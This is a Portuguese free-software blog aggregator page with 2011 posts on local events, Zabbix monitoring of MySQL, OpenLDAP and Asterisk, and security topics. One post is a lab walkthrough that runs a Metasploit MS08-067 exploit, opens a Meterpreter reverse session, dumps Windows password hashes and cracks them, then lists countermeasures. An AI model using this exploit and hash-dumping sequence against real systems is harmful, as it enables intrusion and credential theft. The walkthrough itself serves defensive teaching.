Ir para o conteúdo
ou

Software livre Brasil

Tela cheia Sugerir um artigo
 Feed RSS

Blogosfera do PSL-Ba

16 de Junho de 2009, 0:00 , por Software Livre Brasil - | 2 pessoas seguindo este artigo.

O Projeto Software Livre Bahia (PSL-BA) é um movimento aberto que busca, através da força cooperativa, disseminar na esfera estadual os ideais de liberdade difundidos pela Fundação Software Livre (FSF), possibilitando assim a democratização do acesso a informação, através dos recursos oferecidos pelo Software Livre. Esta busca tem seus alicerces fundados na colaboração de todos, formando um movimento sinérgico que converge na efetivação dos ideais de Liberdade, Igualdade, Cooperação e Fraternidade.

O Projeto Software Live Bahia é formado pela articulação de indivíduos que atuam em instituições publicas e privadas, empresas, governos ou ONGs, e demais setores da sociedade. Além disso o projeto não é subordinado a qualquer entidade ou grupo social, e não estabelece nenhuma hierarquia formal na sua estrutura interna.


Alexandro Silva: Dicas de medidas preventivas contra técnicas avançadas de evasão

31 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda


As técnicas de invasão estão evoluindo diariamente tornando-se cada vez mais sofisticadas e de dificil detecção, principalmente porque as cooporações negligenciam uso de boas práticas.

As principais ferramentas do mercado, sejam elas proprietárias ou livres, dispõem de opções evasivas avançadas que dificultam a detecção de um ataque.

Algumas ações podem ser aplicadas como medida de prevenção contra técnicas avançadas de evasão ( TAE ):


1 – As TAEs diferem das ações evasivas tradicionais. É importante entender que elas não são ataques e sim formas de ocultar de um IPS ou firewall a exploração de uma vulnerabilidade, por isso é necessário entender seu funcionamento e as medidas de proteção.

2 – Auditar constantemente a infraestrutura localizando vulnerabilidades e analisar e mitigar os riscos.

3 – Monitorar a atualização ( patchs ) de todos os sistemas constantemente. Os ataques só ocorrem quando existem vulnerabilidades para serem exploradas.

4 – Avaliar se as soluções de firewall e IPS estão preparadas para proteger a infraestrutura contra estas técnicas.

5 – Implantar uma gerência de segurança centralizada. A descentralização e a falta de uma gerência efetiva e pró-ativa dos dispositivos de segurança permitem que TAEs sejam aplicadas com sucesso garantido nos resultados.

6 – Simular ataques ( pen-testing ) usando estas técnicas no ambiente “real” com o objetivo de detectar o nível de proteção que os atuais dispositivos de segurança adotados na empresa podem propocionar.

A adoção destas medidas permite ampliar o conhecimento sobre o quanto sua infraestrutura de segurança está preparada para proteger seus ativos. O bom senso, conhecimento e cultura de segurança devem ser premissas básicas no dia a dia dos profissionais que são responsáveis pela salva-guarda dos ativos de uma empresa.

FonteHelp Net Security



JavaBahia: IIIº encontro nas universidades

30 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários aindaData: 5 de abril (terça-feira)
hora: 19:00
Local: Prédio de Aulas 5, Unifacs Imbui
Entrada: Gratuita

Palestra GoogleMaps API-
Palestrante: Luciano Borges
Mini-currículo: Mestrando em Sistemas de Computação pela Unifacs, analista de desenvolvimento do SERPRO e professor da Faculdade Hélio Rocha. Experiência em desenvolvimento de sistemas web, tendo atuado de programador a gerente de projetos nas empresas em que atuou. Entusiasta dos temas: sistemas web, sistemas de informações geográficas nas web (sigweb) e ruby on rail.

Palestra: Coding Dojo com Python-
Palestrante: Luiz Cláudio Silva
Mini-currículo: Formado em Processamento de Dados, especialista em Redes de Computadores e mestrando em Modelagem Computacional. Atualmente é Assessor do IEL/BA. Trabalha com desenvolvimento e administração de sistemas desde 1996, tendo usado diversas linguagens e metodologias. É membro dos grupos Python Bahia e LinguÁgil.



inscrições:  http://www.jugevents.org/jugevents/event/show.html?id=36408
Evento anterior: http://javabahia.blogspot.com/2011/03/ii-javabahia-nas-univerisadades-2011.html




Rafael Gomes: Lançamento do Zabbix 1.9.3 Alpha

30 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

Continuando o ritmo de novidades dessa ótima ferramenta de monitoramento, a equipe do Zabbix lança sua nova versão, ainda em alpha, para a comunidade.

Zabbix é uma solução, de código aberto, de monitoramento distribuído de ativos. Um software de alto nível, muito utilizado no mercado corporativo. Ele é liberado sob a GPL, portanto, é gratuito tanto para uso comercial e não comercial. O texto completo da licença está disponível em http://www.gnu.org/copyleft/gpl.txt.

Segue abaixo as novidades:

:: Monitoramento JMX remoto

Essa opção permite monitorar nativamente, com segurança, e remotamente aplicações java e populares middlewares, tal como JBoss, WebSphere e WebLogic.

:: Tipo de dados booleano

Tipo de dados booleanos pode ser usado para monitoramento de duas métricas e contadores JMX, que tem tipo booleano.

:: Novo pacote de ícones

Novo mapa de ícones está disponível para deixar seus mapas mais elegantes e bonitos.

:: Suporte a novos macros

Adicionado suporte para macros {IPADDRESS}, {HOST.DNS} e {HOST.CONN}.

:: Múltiplas interfaces de rede

Múltiplas interface de rede pode ser configuradas em apenas um host, portanto um host pode ter diversos endereços IP com diferentes checagens por IP.

:: Melhora no framework de tradução para interface WEB

Traduções da interface do Zabbix são manipuladas pelo módulo GNU gettext.

:: Auto-registro com checagem passiva

Adicionado o suporte de monitoramento para auto-registro, com checagem passiva. Isso é muito usado para monitoria de ambientes em nuvem.

:: Ajuste de eventos e triggers de status desconhecido

Triggers e eventos em estado desconhecido não serão exibidos pela interface web, uma sinalização especial será exibida em em seu lugar.

:: Legendas opcionais do gráfico

Legendas do gráfico pode ser opcionalmente desabilitado.

:: Customização da severidade das triggers

As triggers padrões agora podem ser customizadas, com nomes e cores diferentes.

:: Nova tela de login

A tela de login foi refeita e agora está mais bonita.

:: Novo formulário para configuração de ações

O novo formulário, com separações claras de parâmetros gerais, condições e ações.

:: Exportar os eventos para CSV

Eventos disponíveis no Zabbix agora podem ser exportados para o formato CSV em apenas um clique.

:: Suporte a SQLite3 no servidor Zabbix

SQLite3 agora pode ser usado no servidor Zabbix e trabalha também com a interface WEB. Ótima notícia para ambientes simples.

Gostou? Quer usar? Lembre-se que esse software NÃO é aconselhável para ambientes de produção, ou seja, faça por sua conta em risco.

Veja nesse link como instalar ou atualizar o ser Zabbix.

Fonte – Zabbix.com



Rafael Gomes: Monitorando o MySQL com o Zabbix

30 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

Seguindo os posts sobre Zabbix, irei explicar agora como monitoramos a capacidade do SGBD MySQL com o Zabbix.

Nos continuaremos a utilizar o UserParameter, que já foi explicado nesse post.

Primeiro vamos criar um usuário simples para que possa ser utilizado nas consultas ao banco MySQL:

# mysql -u root -p

mysql> CREATE USER 'monitor'@'localhost';

mysql> exit

Pronto, agora já criamos um usuário simples para a monitoria.

Agora adicione as linhas abaixo no final do arquivo /etc/zabbix/zabbix_agentd.conf :

## MySQL

UserParameter=user.mysql.ping,mysqladmin -umonitor ping|grep alive|wc -l
UserParameter=user.mysql.uptime,mysqladmin -umonitor status|cut -f2 -d":"|cut -f1 -d"T" | awk '{print $1}'
UserParameter=user.mysql.threads,mysqladmin -umonitor status|cut -f3 -d":"|cut -f1 -d"Q" | awk '{print $1}'
UserParameter=user.mysql.questions,mysqladmin -umonitor status|cut -f4 -d":"|cut -f1 -d"S" | awk '{print $1}'
UserParameter=user.mysql.slowqueries,mysqladmin -umonitor status|cut -f5 -d":"|cut -f1 -d"O" | awk '{print $1}'
UserParameter=user.mysql.opentables,mysqladmin -umonitor status|cut -f8 -d":" |cut -f2 -d" "
UserParameter=user.mysql.qps,mysqladmin -umonitor status|cut -f9 -d":" |cut -f2 -d" "

Pronto, agora basta que você configure os itens no servidor Zabbix e aguarde a nova coleta.



Alexandro Silva: Cibercrime: EaaS ( exploit-as-a-service )

30 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

Os cibercriminosos inauguram mais uma fase da evolução do SaaS: além de disponibilizarem conjuntos de ferramentas de exploração de vulnerabilidades de sites, associam serviços de hospedagem. É o “exploit-as-a-service”. Os clientes pagam pelo período de tempo em que as iniciativas estão infectando ativamente os computadores.

Os conjuntos de ferramentas oferecem vários tipos de “exploits”, ou seja, sequências de códigos capazes de permitir ao usuário tirar partido de vulnerabilidades de software, para introduzir malware em um sistema. Investigadores da Seculert descobriram que pelo menos um par desses conjuntos ou kits – Incognito 2.0 e Bomba – oferecem os seus próprios serviços de alojamento na web – assim como uma interface de gestão acessível pela internet.

O novo modelo de negócio torna mais fácil a vida dos cibercriminosos ou operadores com problemas em garantir a robustez do alojamento de servidores com malware, disse Aviv Raff, CTO e co-fundador da Seculert. A empresa especializou-se no serviço baseado em cloud computing que alerta os seus clientes para novos fenômenos de malware, vulnerabilidades e outras ameaças virtuais.

O conjunto de ferramentas descoberto destina-se a criminosos interessados em atacar um grande número de computadores com Microsoft Windows. Uma vez violada a segurança dos computadores, as máquinas podem ser usadas para roubar dados pessoais, enviar spam, e realizar ataques de negação de serviço…

Leia mais em IDG Now – Segurança



Serge Rehem: Entrevista à Rádio Serpro sobre Colaboração

30 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

Semana passada fiquei muito honrado ao ser convidado pela Rádio Serpro para uma entrevista sobre colaboração. Foram mais de 40 minutos de conversa, que deverão ser editados em até 5. Vai dar trabalho, acho :D

No podcast abaixo, disponibilizo o papo na íntegra. Falo um pouco sobre o aprendizado que venho adquirindo, praticando e compartilhando neste blog, passando por vários tópicos: colaboração x compartilhamento, aspectos técnico e emocionais da colaboração, coexistencia de competição e colaboração, cultura de colaboração, atitudes individuais + gestão + estruturas organizacionais, web 2.0, trabalho cooperado no serpro, uso de metodologias ágeis, dentre outros.



Lucas Almeida Rocha: The Board in the Summer

29 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

As you probably know by now, GNOME has been accepted as a mentoring organization in Google’s Summer of Code 2011. Student applications period started yesterday! If you’re a student excited about GNOME, have a look at our wiki page for more information and project ideas! Application period ends on April 8.

This year I decided to mentor one project related to The Board. The idea is to implement a Tracker storage for the app. Using Tracker will allow us to implement smart searches in the app itself and expose The Board’s data to other desktop components.

So, if you’re a student looking for an interesting project to hack on as part of the Summer of Code this year, this is an exciting opportunity to work on a cool app using bleeding edge GNOME technologies (Clutter, GTK+ 3, Gjs, Tracker, etc).



Alexandro Silva: Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack

29 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

Quando o assunto é payload o Meterpreter é sem sombra de dúvidas o estado da arte. Como ele é executado na memória da vitima acaba se tornando um alvo de dificil detecção por antivírus e IPSs.

Ele é recheado de comandos que permitem diversas ações desde visualização das informações até controle do microfone e webcam do alvo.

Neste láb. irei usar o hashdump para obter o dump de senhas e farei um password brute force usando o Ophcrack. O Ophcrack é um password cracker multiplataforma livre baseado em rainbow tables para quebra de senha de sistemas Windows.

Existem tables gratuitas no site da ferramenta, porém a tables especiais são encontradas no lado negro da força.


Vamos aos testes

Iniciando um conexão com o Meterpreter e obtendo o dump de senhas

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 11.11.11.11:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2003 – No Service Pack – lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 11.11.11.11
[*] Meterpreter session 1 opened (11.11.11.11:4444 -> 11.11.11.11:1031) at Mon Mar 28 20:41:25 -0300 2011

meterpreter > hashdump

Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:9ccce0e593125118ac7357e105e50589:::

Com o hash em mão é hora do Ophcrack fazer o trabalho sujo!

Como vocês podem ver o Ophcrack levou cerca de 11 min para quebrar está senha relativamente fácil.

Contramedidas

Use as seguintes medidas preventivas contra este tipo de ataque:

1 – Use senhas complexas;

2 – Não use somente um tipo de autenticação. Além de algo que você sabe é interessante usar algo que você tem ( e.g. token, biometria );

3 – Mantenha seu sistema atualizado;

4 – Mantenha o firewall local ativado;

5 – Use sistemas de proteção robustos e com checagem em tempo real da memória;

6 – Se você não está afim de gastar ( item 5 ) então utilize o MSE ( Microsoft Security Essentials ) juntamente com um firewall pessoal.


Mais informações:

How to prevent Windows from storing a LAN manager hash of your password in Active Directory and local SAM databases

Frequently Asked Questions about Passwords and Password Attacks



JavaBahia: II javaBahia nas universidades 2011: saiba como foi

29 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda
Aconteceu na FIB no dia 26 de março, sábado, o segundo encontro javaBahia nas Faculdades. Neste evento tiveram duas apresentações: Cleverson Sacramento, falando sobre o Demoiselle e Lucilia falando sobre testes. No final, um dojo com Groovy conduzido por Serge Rehem (mais informações no dojo-bahia).

Público da FIB


Cleverson Sacramento

Lucília de Oliveira

Otávio Santana,Serge Rehem, Lucília de Oliveira


O evento foi muito bom e com um ótimo público. Agradecimento aos professores, alunos e toda Organização da FIB.


Fotos:


Find more photos like this on Open Source University Meetup









Videos:












Apresentações:








Rafael Gomes: Monitorando o OpenLDAP com o Zabbix

28 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

No post anterior, eu demonstrei como podemos monitorar uma infinidade de itens no agente, usando a sintaxe UserParameter, e utilizei como exemplo a monitoria do Asterisk.

Hoje irei demonstrar como podemos monitorar a capacidade do OpenLDAP.

Acesse o arquivo /etc/openldap/slapd.conf e adicione abaixo da sua sintaxe database atual as seguintes linhas:

database monitor

access to dn.subtree="cn=Monitor"
by dn.exact="uid=monitor,ou=Users,dc=dominio,dc=net,dc=br" read
by * none

Com a sintaxe access eu restringi o acesso a essa base de monitor apenas para o usuário monitor, ou seja, não esqueça de criar esse usuário em sua base LDAP.

Salve o arquivo e reinicie o serviço do openldap.

Para configurar a monitoria do OpenLDAP no agente, acesse o arquivo /etc/zabbix/zabbix_agentd.conf e adicione as seguintes linhas:

## OPENLDAP

# Monitorar conexões ativas do OpenLDAP

UserParameter=user.openldap.current.conections,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Current,cn=Connections,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorCounter:" | awk '{print $2}'

# Monitorar adições na base do OpenLDAP

UserParameter=user.openldap.add.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Add,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.add.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Add,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'

# Monitorar adições na base do OpenLDAP

UserParameter=user.openldap.delete.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Delete,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.delete.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Delete,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'

# Monitorar buscas na base do OpenLDAP

UserParameter=user.openldap.search.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Search,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.search.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Search,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'

# Monitorar bind na base do OpenLDAP

UserParameter=user.openldap.bind.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Bind,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.bind.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Bind,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'

# Monitorar Abandon na base do OpenLDAP

UserParameter=user.openldap.abandon.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Abandon,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.abandon.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Abandon,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'

# Monitorar Modify na base do OpenLDAP

 

UserParameter=user.openldap.modify.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Modify,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.modify.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Modify,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'

Salve o arquivo e reinicie o serviço do zabbix-agent.

Acredito que quem gerencia um OpenLDAP, conhece o comando ldapsearch e não entrarei no detalhe desse comando aqui. Caso precise de documentação, acesse esse link.

Agora basta configurar os itens no servidor Zabbix e aguardar a nova coleta dos dados.

Fonte



JavaBahia: II javaBahia nas univerisadades 2011 como foi

28 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda
Aconteceu no dia 26 de março, sábado, o segundo encontro javaBahia nas Faculdade que aconteceu na FIB. Neste evento tiveram duas apresentações, Cleverson Sacramento,  falando sobre o demoiselle e Lucilia falando sobre testes. E um dojo com Groovy feita por Serge Rehem, mais informações no dojo-bahia.

Público da FIB


Cleverson Sacramento

Lucília de Oliveira

Otávio Santana,Serge Rehem,  Lucília de Oliveira


O evento foi muito, e com um bom número de público um agradecimento aos professores, alunos e toda Organização da FIB.


Fotos:



Find more photos like this on Open Source University Meetup







Videos:












Apresentações:








Lucas Almeida Rocha: The Board 0.1.2

28 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

It turns out that The Board‘s distro packages were a great success! The PPA package alone has been downloaded more then 330 times in just a week. Not bad for package only available for an unreleased version of Ubuntu. And I’m not even counting the implicit testers using the GNOME 3 live image. I’ve got some useful feedback from early testers and I expect get even more from now on.

I was planning to finish some new major features before releasing 0.1.2, but a serious crash has been reported and I felt I had to respond to it quickly to avoid losing early testers. So, I give you The Board 0.1.2!

Besides the crash fix, this release contains a few nice improvements and bug fixes such as the addition of keyboard shortcuts for aligning and distributing elements on the page, more subtle window dimming when an element is activated, and proper saving when multiple elements are dragged. Major features such as Cheese integration are probably coming as part of the next release.

I’ve already pushed the updates to The Board’s PPA. If you already have it in your sources list, you should get it in the next few hours. I expect openSUSE and Fedora packages to be updated soon. If you haven’t tried The Board yet, what are you waiting for? Follow the instructions from my last blog post and start testing a few minutes!



Alexandro Silva: Meterpreter: VNC Crack Contramedidas

28 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

Seguem algumas recomendações de como se previnir contra o ataque de VNC Password Cracking usando o módulo enum_vnc_passwd do MSF Meterpreter.

0 – Use senhas complexas;

1 – Bloqueie todos os acessos externos usando o firewall do Windows ou do seu Antivírus, se existir este recurso é claro. Para quem usa Linux recomendo o Firestarter;

2 – Crie uma regra permitindo somente o acesso as portas TCP 5900/5800 através de seu ip externo. Por exemplo se você acessa sua máquina do trabalho libere o acesso apenas para o ip do NAT ( 200.x.x.x );

3 – Configure uma VPN;

4 – Altere as portas padrões do VNC;

5 – Não use VNC. ;-P

OBS: Para mim a opção 03 é a mais recomendada.



Wille Marcel: Participe do Flisol 2011 – Cruz das Almas

28 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

Estou na organização do Flisol 2011, em Cruz das Almas/BA. O evento será realizado dia 09 de Abril a partir das 09h, no Pavilhão de Aulas 1 do Campus da UFRB. Na programação, teremos algumas palestras, oficinas, instalação e distribuição de softwares livres.

As palestras já confirmadas são as seguintes:

  • O que é Software Livre e por que utilizar? – Wille Marcel
  • Desenvolvimento de Sites com CMS – César Velame
  • Interfaces multitoques em ambientes livres – Luís Paulo Colombiano
  • Ekaaty Linux – Nadilson dos Santos de Santana

Além disso, Aurélio Heckert e Valéssio Brito vão apresentar duas palestras sobre Arte com Softwares Livres, participe da escolha dos temas, votando na enquete no site http://www.ufrb.edu.br/flisol.

O FLISOL (Festival Latinoamericano de Instalação de Software Livre) é o maior evento de divulgação de Software Livre da América Latina. Ele acontece desde 2005 e seu principal objetivo é promover o uso de software livre, apresentando sua filosofia, seu alcance, avanços e desenvolvimento ao público em geral. Além de Cruz das Almas, o evento será realizado, no mesmo dia, em centenas de cidades de toda a América Latina. Confira se haverá Flisol na sua cidade no site oficial.

Baixe o cartaz em PDF, imprima e ajude a divulgar o evento.



Rafael Gomes: Monitorando ligações ativas do Asterisk usando Zabbix

27 de Março de 2011, 0:00, por Software Livre Brasil - 0sem comentários ainda

Como havia informado, há muito tempo atrás, nesse post, eu comecei a utilizar a ferramenta de monitoramento chamada Zabbix e desse momento até então não consigo encontrar ferramenta melhor.

Ok, o meu não é assim, mas tudo bem...

Estou montando uma nova central de monitoramento, no meu novo emprego, e me deparo com uma central de telefonia Voip Asterisk.

Após uma pesquisa rápida, descobri que o comando abaixo informa as ligações ativas no Asterisk, ou seja, quem já usa Zabbix já sabe como monitorar isso certo?

/usr/sbin/asterisk -rvvvvvx 'core show channels'

Caso não seja experiente no Zabbix não se desespere. Irei explicar passo a passo.

O agente do Zabbix tem uma opção chamada UserParameter. Essa opção serve para especificarmos monitoria local, ou seja, com essa opção é possível monitorar TUDO no sistema que tem o agente instalado.

Parece propaganda de telemarketing não é? mas é verdade.

A sintaxe do UserParameter é composto por:

UserParameter=<chave.que.sera.usada.no.zabbix.server>,<comando que será executado pelo usuário zabbix no agente>

Exemplo:

UserParameter=test.echo,echo “1″

Ou seja, quando você configurar no Zabbix server a key test.echo para esse agente, receberá o valor 1. Entendeu?

Vamos agora para o exemplo prático,

Acesse o arquivo /etc/zabbix/zabbix_agentd.conf e adicione a seguinte linha:

UserParameter=user.asterisk.active.calls,sudo /usr/sbin/asterisk -rvvvvvx 'core show channels' | grep "active calls" | awk '{print $1}'

Agora acesse o arquivo /etc/sudoers e adicione a seguinte linha:

zabbix ALL=NOPASSWD:/usr/sbin/asterisk

Nesse mesmo arquivo comente a seguinte linha:

Defaults    requiretty

Pronto! Agora reinicie o serviço do agente Zabbix, configure a sua chave no servidor Zabbix e divirta-se.



Tags deste artigo: nordeste psl bahia